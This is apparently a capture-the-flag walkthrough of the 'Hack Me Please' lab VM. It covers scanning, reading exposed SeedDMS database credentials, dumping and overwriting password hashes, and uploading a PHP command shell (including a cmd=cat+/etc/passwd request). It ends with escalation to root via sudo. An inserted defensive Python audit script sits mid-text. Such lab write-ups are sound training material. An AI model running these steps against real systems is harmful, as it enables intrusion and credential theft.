HACK_ME_PLEASE Target Machine Penetration Notes

nmap -sP 10.80.56.0/24

Attacker host: 10.80.56.101
Target machine: 10.80.56.183

nmap -p- 10.80.56.183

PORT      STATE SERVICE
80/tcp    open  http
3306/tcp  open  mysql
33060/tcp open  mysqlx

nmap -A -n -p 80 10.80.56.183
nmap -A -n -p 3306 10.80.56.183
nmap -A -n -p 33060 10.80.56.183

PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Welcome to the land of pwnland
|_http-server-header: Apache/2.4.41 (Ubuntu)
3306/tcp open  mysql   MySQL 8.0.25-0ubuntu0.20.04.1
| ssl-cert: Subject: commonName=MySQL_Server_8.0.25_Auto_Generated_Server_Certificate
| Not valid before: 2021-07-03T00:33:15
|_Not valid after:  2031-07-01T00:33:15
|_ssl-date: TLS randomness does not represent time
| mysql-info: 
|   Protocol: 10
|   Version: 8.0.25-0ubuntu0.20.04.1
|   Thread ID: 10
|   Capabilities flags: 65535
|   Some Capabilities: ODBCClient, SwitchToSSLAfterHandshake, LongPassword, Speaks41ProtocolNew, ConnectWithDatabase, Support41Auth, SupportsTransactions, SupportsCompression, DontAllowDatabaseTableColumn, InteractiveClient, LongColumnFlag, IgnoreSpaceBeforeParenthesis, SupportsLoadDataLocal, FoundRows, IgnoreSigpipes, Speaks41ProtocolOld, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: \x0D\x13V\x1D\x14\x18\x10\x064\x18\x03l\x11\x7F(Dl\x1C\x02\x01
|_  Auth Plugin Name: caching_sha2_password

http://10.80.56.183

<!-- 
Moonlight Template 
https://templatemo.com/tm-512-moonlight
-->

dirb http://10.80.56.183

# Fetch the image
http://10.80.56.183/img/aa

# Inspecting it reveals an OpenPGP Public Key; looking that up, it is asymmetric encryption commonly used for email, and it seems to be of no use here
zsteg aa.png                      
meta Software       .. text: "Adobe ImageReady"
meta XML:com.adobe.xmp.. file: Unicode text, UTF-8 text, with very long lines (782), with no line terminators
b1,r,lsb,xy         .. text: "J7[z{%^nD"
b2,abgr,lsb,xy      .. text: "*62?11.0000/."
b2,abgr,msb,xy      .. file: OpenPGP Secret Key
b3,abgr,msb,xy      .. file: OpenPGP Public Key
b4,r,lsb,xy         .. file: OpenPGP Public Key
b4,b,lsb,xy         .. text: "eCC$B33233\""
b4,bgr,msb,xy       .. text: "Wwu_wuWwu"
b4,rgba,lsb,xy      .. text: "PP@/0`@_0N @@@@. -0,0"
b4,abgr,msb,xy      .. text: "@'    @G"

# So the only option left is to start from the front-end code
http://10.80.56.183/js/main.js

// give active class to first link
//make sure this js file is same as installed app on our server endpoint: /seeddms51x/seeddms-5.1.22/
$($('nav a')[0]).addClass('active');

# Found the back-end (admin) interface
http://10.80.56.183/seeddms51x/seeddms-5.1.22/

# Searching for exploits shows RCE exists, but none of them bypass the login
searchsploit seeddms                            
------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                           |  Path
------------------------------------------------------------------------- ---------------------------------
Seeddms 5.1.10 - Remote Command Execution (RCE) (Authenticated)          | php/webapps/50062.py
SeedDMS 5.1.18 - Persistent Cross-Site Scripting                         | php/webapps/48324.txt
SeedDMS < 5.1.11 - 'out.GroupMgr.php' Cross-Site Scripting               | php/webapps/47024.txt
SeedDMS < 5.1.11 - 'out.UsrMgr.php' Cross-Site Scripting                 | php/webapps/47023.txt
SeedDMS versions < 5.1.11 - Remote Command Execution                     | php/webapps/47022.txt
------------------------------------------------------------------------- ---------------------------------

# Finally, consulting a writeup: this SeedDMS install has its database credentials in settings.xml under the conf directory
<database dbDriver="mysql" dbHostname="localhost" dbDatabase="seeddms" dbUser="seeddms" dbPass="seeddms" doNotCheckVersion="false"> </database>

# Log in to the database
mysql -h 10.80.56.183 -useeddms -pseeddms

# user table
+-------------+---------------------+--------------------+-----------------+
| Employee_id | Employee_first_name | Employee_last_name | Employee_passwd |
+-------------+---------------------+--------------------+-----------------+
|           1 | saket               | saurav             | Saket@#$1337    |
+-------------+---------------------+--------------------+-----------------+

# tblUsers table
+----+-------+----------------------------------+---------------+--------------------+----------+-------+---------+------+--------+---------------------+---------------+----------+-------+------------+          
| id | login | pwd                              | fullName      | email              | language | theme | comment | role | hidden | pwdExpiration       | loginfailures | disabled | quota | homefolder |
+----+-------+----------------------------------+---------------+--------------------+----------+-------+---------+------+--------+---------------------+---------------+----------+-------+------------+
|  1 | admin | f9ef2c539bad8a6d2f3432b6d49ab51a | Administrator | address@server.com | en_GB    |       |         |    1 |      0 | 2021-07-13 00:12:25 |             0 |        0 |     0 |       NULL |
|  2 | guest | NULL                             | Guest User    | NULL               |          |       |         |    2 |      0 | NULL                |             0 |        0 |     0 |       NULL |
+----+-------+----------------------------------+---------------+--------------------+----------+-------+---------+------+--------+---------------------+---------------+----------+-------+------------+

# Tried to crack the MD5 but failed; update the database directly, setting the password to the MD5 of 123456
UPDATE tblUsers SET pwd='e10adc3949ba59abbe56e057f20f883e' where id=1;
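As an added defender-side example (not part of the original writeup), this Python script audits the two weaknesses the walkthrough leans on: a SeedDMS `<database>` element whose dbPass equals the user or database name, and tblUsers rows whose pwd is an unsalted MD5 of a common password. The XML fragment, the rows and the tiny password list are constructed samples modelled on the ones shown above.

```python
"""Audit a SeedDMS settings.xml <database> element and tblUsers pwd values.
Added example; the sample XML, rows and word list are constructed."""
import hashlib
import re
import xml.etree.ElementTree as ET

# Constructed sample mirroring the layout of the exposed settings.xml.
SETTINGS_XML = """<configuration>
  <database dbDriver="mysql" dbHostname="localhost" dbDatabase="seeddms"
            dbUser="seeddms" dbPass="seeddms" doNotCheckVersion="false"> </database>
</configuration>"""

# Constructed tblUsers rows as (login, pwd); SeedDMS 5.x stores plain MD5.
TBL_USERS = [("admin", "e10adc3949ba59abbe56e057f20f883e"), ("guest", None)]

# Deliberately small audit list of widely used passwords (constructed).
COMMON_PASSWORDS = ["123456", "password", "admin", "seeddms"]


def audit_database_element(xml_text):
    """Return findings for the <database> element (root or direct child)."""
    findings = []
    root = ET.fromstring(xml_text)
    db = root if root.tag == "database" else root.find("database")
    if db is None:
        return ["no <database> element found"]
    user = db.get("dbUser", "")
    pw = db.get("dbPass", "")
    dbname = db.get("dbDatabase", "")
    if not pw:
        findings.append("empty dbPass")
    if pw and pw in (user, dbname):
        findings.append("dbPass equals dbUser or dbDatabase")
    if len(pw) < 12:
        findings.append("dbPass shorter than 12 characters")
    return findings


def audit_user_hashes(rows, wordlist=COMMON_PASSWORDS):
    """Flag unsalted-MD5 storage and hashes that equal a common password."""
    findings = []
    for login, pwd in rows:
        if pwd is None:  # disabled / password-less accounts such as guest
            continue
        if re.fullmatch(r"[0-9a-f]{32}", pwd):
            findings.append(f"{login}: unsalted MD5 hash (no per-user salt)")
            if any(hashlib.md5(c.encode()).hexdigest() == pwd for c in wordlist):
                findings.append(f"{login}: hash matches a common password")
    return findings
```

Both findings point at the same fix: keep conf/settings.xml outside the web root (or deny it in the web server config), give the database account a long unique password, and treat any 32-hex pwd column as a signal to migrate to a salted, slow hash.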

# Logged in to the back end successfully; reading 47022.txt shows a file upload exists, and the uploaded file is reachable via data/1048576/document_id/1.php
cat 47022.txt

Step 3: Now after uploading the file check the document id corresponding to the document.
Step 4: Now go to example.com/data/1048576/"document_id"/1.php?cmd=cat+/etc/passwd to get the command response in browser.

# Upload the 1.php reverse shell script following that format
http://10.80.56.183/seeddms51x/data/1048576/11/1.php

# Switch to an interactive shell
python3 -c "import pty;pty.spawn('/bin/bash')"

# Entering /home reveals the user saket
saket@ubuntu:/home$ ls
ls
saket

# Using the database information above, switch user
su saket

# Check sudo privileges; it turns out to be root
sudo -l

# Privilege escalation; box complete
sudo su

cd /root